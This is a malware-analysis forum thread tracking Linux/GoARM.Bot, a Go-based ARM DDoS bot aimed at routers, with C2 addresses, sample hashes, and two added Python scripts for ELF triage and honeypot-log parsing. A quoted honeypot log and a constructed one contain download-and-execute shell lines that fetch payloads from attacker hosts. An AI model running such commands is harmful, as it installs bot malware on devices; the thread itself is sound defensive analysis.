A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #23910  by unixfreaxjp
 Wed Sep 17, 2014 6:55 am
This GOARM binary was reported to me: https://www.virustotal.com/en/file/81c9 ... 410603481/ Many downloads (screenshot attached).
It's an ARM architecture bot, written in Go and compiled for ARMv6 with crypto and encoding libs. Go project PoC:
Code:
// go runtime..
0x29B39C   runtime.selectgo
0x2AB1EC   runtime.gogo
(etc)
// go project..
0x31A3D1   /Users/fc/GoProjects/armv6/src/server2/server.go
0x31A403   /Users/fc/GoProjects/armv6/src/server2/message.pb.go
0x31A439   /Users/fc/GoProjects/armv6/src/server2/client.go
0x31BDE1   /Users/fc/GoProjects/armv6/src/main.go
// Go source codes:
 %3d: t=%3d start
 %3d: t=%3d bytes [%d]
 %3d: t=%3d end err %v
 %3d: t=%3d fix32 %d
 %3d: t=%3d fix64 %d
 %3d: t=%3d varint %d
 %3d: fetching op err %v
 %3d: t=%3d fix32 err %v
 %3d: t=%3d fix64 err %v
 %3d: t=%3d start err %v
 %3d: t=%3d unknown wire=%d
 %3d: t=%3d varint err %v
 %3d: t=%3d end
 %3d: start-end not balanced %d 
HTTP send template:
Code:
%s %s HTTP/1.1
User-Agent: %s
; Domain=%s
; Path=%s
; Expires=%s
; Max-Age=%d
Host: %s 
^^ Spotted together with the DDoS'er tools. Feel free to give your verdict on this further :D
Last edited by unixfreaxjp on Wed Sep 17, 2014 8:45 am, edited 1 time in total.
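The first post identifies the sample by hand from three things: the ELF header (ARM), the Go runtime symbols, and the developer's source paths left in the binary. The following script automates that first-pass triage. It is an added example and is not the poster's tooling or the malware's code; the ELF bytes it scans are a constructed, minimal ARM header followed by strings of the kind quoted above, not the real sample, and the Go-version, runtime-symbol and source-path regexes are heuristics that assume the usual string layout of a Go 1.x binary.

```python
import json
import posixpath
import re
import struct

EM_ARM = 40  # e_machine value for ARM in the ELF specification

# --- ELF header -------------------------------------------------------------

def parse_elf_header(data: bytes):
    """Return architecture facts from an ELF header, or None if data is not ELF."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        return None
    bits = {1: 32, 2: 64}.get(data[4])        # EI_CLASS
    endian = {1: "<", 2: ">"}.get(data[5])    # EI_DATA
    if bits is None or endian is None:
        return None
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags
    if bits == 32:
        fields = struct.unpack(endian + "HHIIIII", data[16:40])
    else:
        if len(data) < 64:
            return None
        fields = struct.unpack(endian + "HHIQQQI", data[16:52])
    e_type, e_machine, _, _, _, _, e_flags = fields
    info = {
        "bits": bits,
        "little_endian": endian == "<",
        "e_type": e_type,                      # 2 = ET_EXEC (static binaries are usually EXEC)
        "machine": "ARM" if e_machine == EM_ARM else hex(e_machine),
    }
    # On ARM the top byte of e_flags is the EABI version (5 for modern toolchains).
    info["eabi"] = (e_flags >> 24) & 0xFF if e_machine == EM_ARM else None
    return info

# --- Go indicators ----------------------------------------------------------

GO_VERSION_RE = re.compile(rb"go1\.\d+(?:\.\d+)?")
RUNTIME_SYM_RE = re.compile(rb"runtime\.[A-Za-z_][A-Za-z0-9_]*")
GO_SOURCE_RE = re.compile(rb"(?:/[A-Za-z0-9_.\-]+)+\.go(?![A-Za-z0-9])")
STDLIB_PKG_RE = re.compile(rb"(?:crypto|encoding)/[a-z0-9]+")


def go_indicators(data: bytes) -> dict:
    dec = lambda s: s.decode("ascii")
    versions = sorted({dec(m) for m in GO_VERSION_RE.findall(data)})
    files = sorted({dec(m) for m in GO_SOURCE_RE.findall(data)})
    root = None
    if files:
        # The developer's build tree ($GOPATH/src) leaks through the embedded paths.
        root = posixpath.commonpath(files)
        if root in files:                      # single file: commonpath is the file itself
            root = posixpath.dirname(root)
    return {
        "version": versions[0] if versions else None,
        "runtime_symbols": sorted({dec(m) for m in RUNTIME_SYM_RE.findall(data)}),
        "source_files": files,
        "build_root": root,
        "stdlib_packages": sorted({dec(m) for m in STDLIB_PKG_RE.findall(data)}),
    }


def triage(data: bytes) -> dict:
    ind = go_indicators(data)
    ind["is_go"] = bool(ind["runtime_symbols"] or ind["source_files"])
    return {"elf": parse_elf_header(data), "go": ind}

# --- Constructed sample (NOT the real GoARM binary) -------------------------

def make_fake_arm_elf(payload: bytes) -> bytes:
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELF32, little-endian, SysV
    # e_type=EXEC, e_machine=ARM, e_version=1, e_entry, e_phoff, e_shoff,
    # e_flags=EABI v5, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    rest = struct.pack("<HHIIIIIHHHHHH", 2, EM_ARM, 1, 0x8000, 52, 0,
                       0x05000000, 52, 32, 0, 40, 0, 0)
    return e_ident + rest + payload


SAMPLE = make_fake_arm_elf(
    b"\x00go1.3\x00runtime.selectgo\x00runtime.gogo\x00"
    b"/Users/fc/GoProjects/armv6/src/server2/server.go\x00"
    b"/Users/fc/GoProjects/armv6/src/server2/message.pb.go\x00"
    b"/Users/fc/GoProjects/armv6/src/main.go\x00"
    b"crypto/aes.(*aesCipher).Encrypt\x00encoding/json.Unmarshal\x00"
)

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run it against a real file with `triage(open(path, "rb").read())`; the `build_root` field is what gives you the `/Users/fc/GoProjects/armv6/src` style pivot the post uses to tie samples to one developer.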
 #23911  by unixfreaxjp
 Wed Sep 17, 2014 7:54 am
Another sample, different source: https://www.virustotal.com/en/file/27d4 ... 410939480/
So it is used by other infections too.. It is official then, new malware: Linux/GoARM.Bot.
Naming explanation:
GO = GO language
ARM = specifically compiled for ARM..
Bot.. I can confirm the bot (backdoor) function and HTTP command, as well as the low-level functions (connections, calls), but I am still working on its DDoS function, so "Linux/GoARM.Bot" it is.
Last edited by unixfreaxjp on Wed Sep 17, 2014 12:20 pm, edited 1 time in total.
 #24176  by unixfreaxjp
 Mon Oct 20, 2014 4:24 pm
New sample with quite a lot of infection hits; this malware is specifically designed to aim at ARM devices (screenshot attached).
VT: https://www.virustotal.com/en/file/5883 ... 413822096/ (thanks to benkow)
CNC:
Code:
222.186.56.102||23650 | 222.186.56.0/21 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
 #26759  by unixfreaxjp
 Sat Sep 19, 2015 7:59 am
A fresh new one, attacking routers together with MrBlack & AESddos ("hacker") (screenshot attached).
Sample: https://www.virustotal.com/en/file/3b6d ... /analysis/
CNC: 222.186.34.220, panel: 183.60.216.182, bruter (SSH): 60.166.61.110
Code:
2015-09-18 10:35:39 [session=78,ip=60.166.61.110] wget http://183.60.216.182:88/scan.exe
2015-09-18 10:35:44 [session=78,ip=60.166.61.110] chmod 777 scan.txt
2015-09-18 10:35:49 [session=78,ip=60.166.61.110] ./scan.exe &
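The session log above is the classic honeypot view of an SSH bruter: one session, fetch a payload, chmod it, run it in the background. A small parser that turns such logs into IoCs (attacker IP, payload host, fetched URLs) and flags the download-then-execute pattern is shown below. This is an added example, not the poster's honeypot or its output format; it assumes the `timestamp [session=N,ip=X] command` layout of the three lines quoted in the post. Session 78 reproduces those three lines, while sessions 79 and 80 and the malformed line are constructed here, using RFC 5737 documentation addresses, to exercise the chained-command and benign-session paths.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed honeypot log: session 78 is from the post, the rest is invented.
LOG = """
2015-09-18 10:35:39 [session=78,ip=60.166.61.110] wget http://183.60.216.182:88/scan.exe
2015-09-18 10:35:44 [session=78,ip=60.166.61.110] chmod 777 scan.txt
2015-09-18 10:35:49 [session=78,ip=60.166.61.110] ./scan.exe &
2015-09-18 11:02:10 [session=79,ip=198.51.100.23] cd /tmp; busybox wget http://203.0.113.9/arm7 && chmod +x arm7 && sh arm7
2015-09-18 11:40:01 [session=80,ip=192.0.2.5] uname -a
2015-09-18 11:40:07 [session=80,ip=192.0.2.5] cat /proc/cpuinfo
this line is not a session record and must be skipped
""".strip().splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"\[session=(?P<sid>\d+),ip=(?P<ip>[\d.]+)\] (?P<cmd>.*)$"
)
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s'\"]+")
# Split a shell one-liner into sub-commands on ; && || and |
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
FETCHERS = {"wget", "curl", "tftp", "ftpget"}
RUNNERS = {"sh", "bash", "nohup"}


def parse_line(line: str):
    """Parse one log record; return None for lines that do not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["sid"] = int(ev["sid"])
    return ev


def classify(subcmd: str) -> str:
    """Label a single sub-command as fetch / chmod / exec / other."""
    tok = subcmd.split()
    if not tok:
        return "other"
    if tok[0] == "busybox" and len(tok) > 1:   # "busybox wget ..." on embedded targets
        tok = tok[1:]
    if tok[0] in FETCHERS:
        return "fetch"
    if tok[0] == "chmod":
        return "chmod"
    if tok[0].startswith("./") or tok[0] in RUNNERS:
        return "exec"
    return "other"


def analyze(lines) -> dict:
    """Group records by session and summarise what each session did."""
    sessions = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            sessions[ev["sid"]].append(ev)
    report = {}
    for sid, evs in sorted(sessions.items()):
        fetched, executed, kinds = [], [], set()
        for ev in evs:
            for sub in SPLIT_RE.split(ev["cmd"]):
                kind = classify(sub)
                kinds.add(kind)
                if kind == "fetch":
                    fetched.extend(URL_RE.findall(sub))
                elif kind == "exec":
                    executed.append(sub.strip())
        report[sid] = {
            "attacker_ip": evs[0]["ip"],
            "first_seen": evs[0]["ts"],
            "urls": fetched,
            "payload_hosts": sorted({urlparse(u).hostname for u in fetched}),
            "executed": executed,
            # The pattern from the post: something was downloaded AND something was run.
            "download_and_execute": "fetch" in kinds and "exec" in kinds,
        }
    return report


def iocs(report: dict) -> dict:
    """Collapse the flagged sessions into blockable indicators."""
    hits = [r for r in report.values() if r["download_and_execute"]]
    return {
        "attacker_ips": sorted({r["attacker_ip"] for r in hits}),
        "payload_hosts": sorted({h for r in hits for h in r["payload_hosts"]}),
        "urls": sorted({u for r in hits for u in r["urls"]}),
    }


if __name__ == "__main__":
    rep = analyze(LOG)
    for sid, r in rep.items():
        print(sid, r)
    print(iocs(rep))
```

Note that the bruter host (`attacker_ip`) and the payload host (`payload_hosts`) are kept separate on purpose: in the post they are different machines (60.166.61.110 versus 183.60.216.182), and conflating them loses the distinction between the SSH scanner and the panel.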
 #26802  by unixfreaxjp
 Fri Sep 25, 2015 4:35 pm
8-) Now I am sure ChinaZ is behind these latest GoARM campaigns;
today's attack, with a stripped & static ARM(el) v7 ELF, looks like it is aiming at Ubuntu-based routers with default passwords.. (screenshot attached)

And here it is (screenshot attached).
Summarized:
Code:
#CHINAZ + #GoARMBot + static strip ARMel #ELF =aim #ROUTER
Atk(ssh): 14.29.32.162
Pnl: 111.206.76.35 (appdown.keyipin.com)
Cnc: 222.186.31.182:6004
Report: http://imgur.com/a/CKBPx <== BIG PICS IS HERE
Routers are not safe anymore.. yet let them come, I'm ready. :lol:

Just to confirm the CNC data as evidence, I took this pcap, but they close the port after several "greetings" beforehand (screenshot attached).

Sample: https://www.virustotal.com/en/file/284a ... 443197004/